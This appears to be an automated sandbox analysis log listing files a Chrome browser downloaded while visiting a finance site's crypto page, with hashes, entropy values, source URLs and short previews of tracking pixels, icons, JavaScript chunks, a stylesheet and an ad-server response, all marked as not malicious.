                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:CUXPQE/xlEy:1QEoy
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:D89746888DA2D9510B64A9F031EAECD5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:D5FCEB6532643D0D84FFE09C40C481ECDF59E15A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:EF1955AE757C8B966C83248350331BD3A30F658CED11F387F8EBF05AB3368629
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:D5DA26B5D496EDB0221DF1A4057A8B0285D15592A8F8DC7016A294DF37ED335F3FDE6A2252962E0DF38B62847F8B771463A0124EF3F84299F262ED9D9D3CEE4C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://pagead2.googlesyndication.com/pagead/gen_204?id=xbid&dbm_b=AKAmf-CHfv6yVSk-d5ZoJjkBr9qpbeOhYeKf-TgCcUoDH52yGxwwoQ_SM55kXGWN9n_e-BANplY5uqG-UGxFgFdGVGqDupJjPlolMAwLEu50TeYvIjtLSv0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:GIF89a.............!.......,...........D.;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):43
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:CUkxl7/lHh/:slf/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:B4491705564909DA7F9EAF749DBBFBB1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:279315D507855C6A4351E1E2C2F39DD9CD2FCCD8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:4E0705327480AD2323CB03D9C450FFCAE4A98BF3A5382FA0C7882145ED620E49
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:B8D82D64EC656C63570B82215564929ADAD167E61643FD72283B94F3E448EF8AB0AD42202F3537A0DA89960BBDC69498608FC6EC89502C6C338B6226C8BF5E14
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (7784)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):8890
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.590889945971922
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:192:z5ogup5Fjc+J4WRWNCdSEnIONsg0ZLqlP2aPK/hc:z5op5FjHJ4QodEIOzSqlVK/q
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:A40971204AAC8236841FE06C8D6B0943
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:00EDF84379CE4F1FBAD3A835CF3F0F68D057AE6F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:70745CD97D02D72E44DDEBE21ED947E764439A97272B292C0898AF32618F52C1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:A4D527D8B64F03DCBF4C114DE1624CCE13BA4852F77BD15B0EDD6673C66848E74948E7C5A069388CF569705FAD06ED281FF2788DBDE96BD03FE6C88D93F92FFC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:const __vite__fileDeps=["../chunks/MarketsHeatmap.BTg5AOHG.js","../chunks/scheduler.Dr9AAxFe.js","../chunks/index.DCSmZEjO.js","../chunks/each.BExQfwb4.js","../chunks/HeatMap.B0RGnH8g.js","../chunks/ErrorMsg.DF_ReW41.js","../chunks/error_outline.CkdKfkE_.js","../chunks/Icon.BSWt_jx8.js","../chunks/spread.CgU5AtxT.js","../assets/Icon.DgFg0-NP.css","../chunks/commonUtil.CI22_Irn.js","../chunks/stores.DPDRpTFd.js","../chunks/43.CtYdpA_T.js","../chunks/control.CYgJF_JY.js","../assets/ErrorMsg.CmzKsgiD.css","../chunks/Link.Cll6KZpb.js","../chunks/i13nUtil.C-uBpR7k.js","../assets/Link.CHR7GGSC.css","../chunks/Spinner.CydnjLPC.js","../assets/Spinner.DBQ4b_Oq.css","../chunks/Tooltip.DgP4ayih.js","../chunks/floating-ui.dom.C5fi-pG6.js","../assets/Tooltip.IRw8ojlh.css","../chunks/GradientScale.EwYudrQa.js","../assets/GradientScale.BwfNrsj8.css","../assets/HeatMap.v9WG23fw.css","../chunks/quoteUtil.DBZgD1yl.js","../chunks/loadQuoteType.mGEeGxqN.js","../chunks/logUtil.hOue7iAU.js","../chunks/index
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PNG image data, 64 x 64, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):2699
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.457476416903536
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:48:pLabu0dkOwTm2glF5vtSF/hOMOqvlSnaqMuscGeLvQ8nIZvdKYr8t2n:Y5dkO156/hjd0Aus0JnUvQYrHn
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:739797800C1AD83BA9A3CDDDB9824693
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:8FA44745CB0A87A781317153FFEBCCA127E4C498
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:6DE001279F8561EBCD5DA21D426F25F0F554B5F665638E84B33876A079C56C52
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:25EC9A6E68A3024E7054C566336CA457A8116C6D29C5B2A901C98EF4D1F14C0ADEB8EF16F56BD8D2E07466EE81C0146ADC992289EFCE6A9FA8C2796EDD4C0FE8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:.PNG........IHDR...@...@.............PLTEGpL.................................................................................................................................................................................................................................................................................................r|....6D.......................-....KV....... 1.P].....$.....(.....%.......^i.z........Ua.............,;....AO........&.........................3A.......HU.hs................R^.s~.eo.\f.......8B.'4.(8.......>K.`k................."..............=.Ye.ny.......am..........&7.:I....LY..+.........................}........CR.......~.................0;....y.....<H.................#.......py.IV......................9F.3C.FP..!.......'1..+.]f.v..Xe................kv.fp.......Y]...._....?tRNS.............]..(.).b.m.a.k..wx.......A..........,.....??...|.....IDATX.Wgt.G.>.Yw.0....M.` .....%...X@....:6-..B...G..N(..zh.%!.wRI.w........ogf.#...U.GD..U.x=E..
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):170
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.335916817166796
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:yionv//thPlE+tnM5OCAadCmy42/uDlhlbGlo+4/iRXTECLrlxyxtyaC/tIlsg1B:6v/lhPfZMQC19s/6TdKXTECL6yR/iVB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:E7673C60AF825466F83D46DA72CA1635
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:FC0FCBEE0835709BA2D28798A612BFD687903FB5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:0B8A20373C6DD04E091902226D922B3688143A8938AFB9D283D889DE7B55CEB5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:F1C33E72643CE366FD578E3B5D393799E8C9EA27B180987826AF43B4FC00B65A4EAAE5E6426A23448956FEE99E3108C6A86F32FB4896C156E24AF0571A11C498
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:.PNG........IHDR....................bKGD..............pHYs.................tIME......-Q.7n....tEXtComment.Created with The GIMP.d%n....IDAT..c.iy......+........IEND.B`..
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):170
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.335916817166796
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:yionv//thPlE+tnM5OCAadCmy42/uDlhlbGlo+4/iRXTECLrlxyxtyaC/tIlsg1B:6v/lhPfZMQC19s/6TdKXTECL6yR/iVB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:E7673C60AF825466F83D46DA72CA1635
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:FC0FCBEE0835709BA2D28798A612BFD687903FB5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:0B8A20373C6DD04E091902226D922B3688143A8938AFB9D283D889DE7B55CEB5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:F1C33E72643CE366FD578E3B5D393799E8C9EA27B180987826AF43B4FC00B65A4EAAE5E6426A23448956FEE99E3108C6A86F32FB4896C156E24AF0571A11C498
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:.PNG........IHDR....................bKGD..............pHYs.................tIME......-Q.7n....tEXtComment.Created with The GIMP.d%n....IDAT..c.iy......+........IEND.B`..
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):42
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):2.9881439641616536
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:CUXPQE/xlEy:1QEoy
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:D89746888DA2D9510B64A9F031EAECD5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:D5FCEB6532643D0D84FFE09C40C481ECDF59E15A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:EF1955AE757C8B966C83248350331BD3A30F658CED11F387F8EBF05AB3368629
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:D5DA26B5D496EDB0221DF1A4057A8B0285D15592A8F8DC7016A294DF37ED335F3FDE6A2252962E0DF38B62847F8B771463A0124EF3F84299F262ED9D9D3CEE4C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:GIF89a.............!.......,...........D.;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:Java source, ASCII text, with very long lines (3179)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):3180
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.351273126862215
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:48:HrFMPdrPjmx8ciWmUJ6T2AhO6dGeA729RVItTR3+K2WraHNy9I3ZiF1l1wu:CPdrPS/mUW26O6dJAy9glloiI3ZiF17
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:E5967E3E82ADB3F92A4D5194241E7E4C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:F725BB853867265B3EBA19865C283D36FA4929BA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:90C2985AB8A7ADB8D615894ECE408C7E52296B312AD84BCA52C49558735D0E72
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:08D20B91CAD1ACB0D93191CF073CAD71972E6B708EF8C97BB9B9A98C3C5CF3A4FA5C7807ADCAF537A3A8AB75B57409CD0E77CCF27816970DDA7F558D6C3B678E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://finance.yahoo.com/assets/_app/immutable/chunks/Typography.BwmQDYSG.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:import{s as A,p as M,k as E,i as b,Y as N,A as q,T as D,c as F,e as G,d as H,f as I,a8 as U,U as x,u as J,g as K,a as L}from"./scheduler.Dr9AAxFe.js";import{S as O,i as Q,t as P,a as Y}from"./index.DCSmZEjO.js";import{g as R}from"./spread.CgU5AtxT.js";var j=(e=>(e.heading="heading",e.body="body",e.ui="ui",e.section="section",e))(j||{}),d=(e=>(e.h1="h1",e.h2="h2",e.h3="h3",e.h4="h4",e.h5="h5",e.h6="h6",e.span="span",e.p="p",e.div="div",e.section="section",e.article="article",e.aside="aside",e.header="header",e.footer="footer",e.ul="ul",e.ol="ol",e.li="li",e.dl="dl",e.dt="dt",e.dd="dd",e.tr="tr",e.td="td",e.th="th",e.caption="caption",e.label="label",e))(d||{}),B=(e=>(e.xxxs="xxxs",e.xxs="xxs",e.xs="xs",e.sm="sm",e.md="md",e.lg="lg",e.xl="xl",e.xxl="xxl",e.xxxl="xxxl",e))(B||{}),z=(e=>(e.bold="bold",e.med="med",e.reg="reg",e))(z||{});const _={heading:["xxxs","xxs","xs","sm","md","lg","xl","xxl"],ui:["xs","sm","md","lg","xl","xxl"],body:["xs","sm","md","lg","xl"],section:["xs","sm","md","
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):26222
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.2381565583144925
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:768:Kbq6V8WxhYKuWY2WxhYKuWYQbpR/9ZJxH2iPO84sKIoyAbY:Ke6+KvKx37JxHzr+bY
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:2CBF4DF4E0E679077BAD0A49DBFDEFB6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:A633B025F79AC5B8DF20209B68A036C587BEE415
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:C5549DBFD5BB85C36A70534922D0D56280D147C16A4E855CEB1EFA73509DBA83
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:1DA22BF32C95D61177EAF3E56E2024C4AA25D82E34B6C49C64F330961A451B1B5D79C21B848D4851748913EFA2BB30B92B606BE63DE0FC37C0133BA361BAF7B9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://securepubads.g.doubleclick.net/gampad/ads?pvsid=1039632299103059&correlator=2482792299468791&eid=44809527%2C31085776&output=ldjh&gdfp_req=1&vrg=202410030101&ptt=17&impl=fifs&gdpr=0&us_privacy=1YNN&gpp_sid=-1&iu_parts=22888152279%2Cus%2Cyfin%2Cscreen%2Cdt%2Cus_yfin_screen_dt_top_center&enc_prev_ius=%2F0%2F1%2F2%2F3%2F4%2F5&prev_iu_szs=3x1%7C970x250%7C728x90&ifi=1&sfv=1-0-40&fsfs=1&fsbs=1&eri=5&sc=1&cookie_enabled=1&abxe=1&dt=1728414878753&adxs=155&adys=24&biw=1280&bih=907&scr_x=0&scr_y=0&btvi=0&ucis=1&oid=2&u_his=1&u_h=1024&u_w=1280&u_ah=984&u_aw=1280&u_cd=24&u_sd=1&u_tz=-240&dmc=8&bc=31&nvt=1&uach=WyJXaW5kb3dzIiwiMTAuMC4wIiwieDg2IiwiIiwiMTE3LjAuNTkzOC4xMzIiLG51bGwsMCxudWxsLCI2NCIsW1siR29vZ2xlIENocm9tZSIsIjExNy4wLjU5MzguMTMyIl0sWyJOb3Q7QT1CcmFuZCIsIjguMC4wLjAiXSxbIkNocm9taXVtIiwiMTE3LjAuNTkzOC4xMzIiXV0sMF0.&url=https%3A%2F%2Ffinance.yahoo.com%2Fmarkets%2Fcrypto%2Fall%2F&vis=1&psz=1280x907&msz=1280x138&fws=0&ohw=0&td=1&egid=22304&topics=9&tps=9&htps=10&nt=1&psd=WzE1LFtdLG51bGwsM10.&dlt=1728414837073&idt=39349&prev_scp=loc%3Dtop_center%26ay_floor_s%3Dfloors%2520set%26ay_floor%3D0.12%26ay_floor_m%3Dm_0.2&cust_params=ay_floor_g%3Doptimize%26ay_floor_m%3Dm_0.2%26ay_floor_s%3Dmodel%2520not%2520loaded%26abk%3D0%26bucket%3Drocket_GA_desk_test-3-v1%252Cypf-bankrate-widget-control-v2-q4%252Cyf-portfoliodetail-control%252Cyf-smartasset-msg-a%252Cypf-new-article-template-release-exp-v2%26cobrand%3Dnone%26colo%3Dir2%26device%3Ddesktop%26lang%3Den-US%26lu%3D0%26region%3DUS%26site%3Dfinance%26ver%3Dnimbus%26usercountry%3DUS%26hashtag%3Dcrypto%26pct%3Dscreener%26pg_name%3Dall%26pt%3Dutility%26spaceid%3D1183331958%26bka%3D0%26hb_uid_mod%3Dliveintentid_on_not_enriched%26li-module-enabled%3Dt1-e0%26lr_env%3Dno-id&adks=1521962139&frm=20&eoidce=1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:{"/22888152279/us/yfin/screen/dt/us_yfin_screen_dt_top_center":["html",0,null,null,1,90,728,0,1,null,null,1,1,[["ID=ab37813630c35ba5:T=1728414881:RT=1728414881:S=ALNI_MYmmhH1PJUrnSkqZi_ZIrVxtprQvQ",1762110881,"/","yahoo.com",1],["UID=00000f31c4b70581:T=1728414881:RT=1728414881:S=ALNI_MYme1wRJaMGctZJcNejemR2bKSFUw",1762110881,"/","yahoo.com",2]],[138477785720],[6275051704],[5285812218],[3186246143],[539868,658893],null,null,null,null,null,null,1,null,null,null,null,null,null,null,"CKKkkJi__4gDFVqHgwcdLb4CyA",null,null,null,null,null,null,null,null,null,null,null,null,null,null,"1",null,null,null,null,null,null,null,null,null,null,null,null,null,null,1,null,null,null,[["ID=2b7b43edc216ef86:T=1728414881:RT=1728414881:S=AA-AfjZLswZv3QCzMQjVs986n8rD",1743966881,"/","yahoo.com"]],[]]}.<!doctype html><html><head><script>var jscVersion = 'r20241007';</script><script>var google_casm=[];</script></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><div class="GoogleActiveVi
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (8545)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):8546
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.508391154066929
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:192:J5fqN3MLNI2PU0AAx0uGuXfArTYKRPUceTW/E7Xgq/zYHjRotI64Ct:J5fqlwNIxApfKUCE7XgqdtI64s
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:B024A2C43820114F5483C732A7C355CE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:B8BE39D8CF8084B0D1EA1EC2D07C3DA80ADD2E4D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:111CD45685DE7F9D43A8A0063BB609D283386DAC7254FA57221A31D75EFC0142
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:01F54DEF2B161DDF360CB05C6BF775EBBE01BEB869B5FC4E04776783F3D202F51ACE9F3924C1896BFDBCF5E6EC744789E245CF8BAE960DA4867CE53B2FA5E39E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://finance.yahoo.com/assets/_app/immutable/chunks/AccordionItem.Cpcl9P2B.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:import{s as w,c as P,e as M,d as O,f as S,i as N,q as c,_ as v,k as L,u as Q,g as Y,a as F,P as re,b as J,j as K,U as C,l as E,A as Z,T as ee,a8 as le,G as ze,Q as Ce}from"./scheduler.Dr9AAxFe.js";import{S as de,i as ue,t as z,a as k,g as me,e as ce,f as ae,c as ke,b as Ne,m as Ie,d as ve}from"./index.DCSmZEjO.js";import{g as ye}from"./spread.CgU5AtxT.js";import{g as _e,r as Te}from"./i13nUtil.C-uBpR7k.js";import{I as Ee}from"./Icon.BSWt_jx8.js";import{C as Me}from"./expand_more.DscV4c36.js";import{s as te}from"./index.C_UqkgE3.js";import{n as Oe}from"./commonUtil.CI22_Irn.js";function Se(l){let e,a,d;const o=l[3].default,f=P(o,l,l[2],null);return{c(){e=M("div"),f&&f.c(),this.h()},l(n){e=O(n,"DIV",{class:!0});var s=S(e);f&&f.l(s),s.forEach(N),this.h()},h(){c(e,"class",a=v(`container ${l[0]}`)+" yf-10zi8b3")},m(n,s){L(n,e,s),f&&f.m(e,null),l[4](e),d=!0},p(n,[s]){f&&f.p&&(!d||s&4)&&Q(f,o,n,n[2],d?F(o,n[2],s,null):Y(n[2]),null),(!d||s&1&&a!==(a=v(`container ${n[0]}`)+" yf-10zi8b3"))&&c(e,
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):43
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:CUkxl7/lHh/:slf/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:B4491705564909DA7F9EAF749DBBFBB1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:279315D507855C6A4351E1E2C2F39DD9CD2FCCD8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:4E0705327480AD2323CB03D9C450FFCAE4A98BF3A5382FA0C7882145ED620E49
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:B8D82D64EC656C63570B82215564929ADAD167E61643FD72283B94F3E448EF8AB0AD42202F3537A0DA89960BBDC69498608FC6EC89502C6C338B6226C8BF5E14
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):150
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.21109664847411
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:M/sqDmJS4RKb5ykKcvXjXRHoNcHbuHPk4FUjwAZIAdSfFE7evn:+9mc4sl3O4Cc4FIVIv
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:11637EFDD5023C74A30749CDBDF996E4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:8D377941670A818645AAAD4008EBF2014B186050
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:CD9E0584F82F63FC2424620113B1EDC4BA6AF9B27A5DEEB9140F61E1CF54B59C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:309058AFFBD9018BF35929E69FE7BE50F42EA384B3FFDF100CC4D02995ECF050CDFB122AE4C152CAC757F1B20DACF13238773F2CFB66F0CD6EF65786C7A37D12
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://finance.yahoo.com/assets/_app/immutable/chunks/keyboard_arrow_down.BadFEUQj.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:const w='<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M7.41 8.59 12 13.17l4.59-4.58L18 10l-6 6-6-6z"/></svg>';export{w as D};.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (517)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):518
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.973044876174046
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12:MKTJ5lMWBn87PNcjZWUWPLXFTAmdss32nNKTJ50Vj:MklEzrPZTvBmnNks
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:AF872E0597ED3534478AFAFCD5AC13A0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:D99EFAD3D9C6125BB600A236BDFA7CF19A3C4B87
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:861377E2BACC93FD8F7634F0720A0CF62357058A95FB4893619396D3AEFC2F7F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:C5D3C6C238626EFD358B67DAF2EBA56D91742741398B0D24C4B8D0E2BC0E747E2CFB69646858174E3BA746707218AE2FAFC2F14BC9469D95749C5513D4B1A6CC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://finance.yahoo.com/assets/_app/immutable/assets/MarketsHeatmap.D2uTipvq.css
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:.heatMapContainer.yf-12jk6tt{height:100%}.tooltip-value.yf-12jk6tt{font-weight:var(--font-medium)}.title.yf-12jk6tt{text-align:left;font-weight:var(--font-bold)}.row.yf-12jk6tt{display:flex;gap:var(--space-2);padding:var(--space-2) 0;justify-content:space-between;line-height:var(--padding-scalar);white-space:nowrap;border-bottom:1px dashed var(--separator)}.row.yf-12jk6tt:last-of-type{border-bottom:none;padding-bottom:var(--space-1)}@media screen and (min-width: 768px){.heatMapContainer.yf-12jk6tt{height:40rem}}.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (1016)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1017
